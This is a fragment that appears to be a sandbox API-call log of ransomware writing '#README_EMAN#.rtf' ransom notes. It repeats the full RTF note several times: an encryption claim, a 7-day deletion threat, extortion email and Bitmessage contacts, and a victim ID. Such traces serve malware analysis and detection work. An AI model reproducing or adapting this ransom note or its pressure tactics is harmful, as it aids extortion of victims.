ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x13\x07", lpUsedDefaultChar=0x0) returned 8717 [0207.818] WriteFile (in: hFile=0x2f4, lpBuffer=0x248a558*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a558*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0207.819] CloseHandle (hObject=0x2f4) returned 1 [0207.819] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\#readme_eman#.rtf")) returned 0xffffffff [0207.819] GetLastError () returned 0x2 [0207.819] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2fc [0207.977] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0207.977] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0207.977] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476d68, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 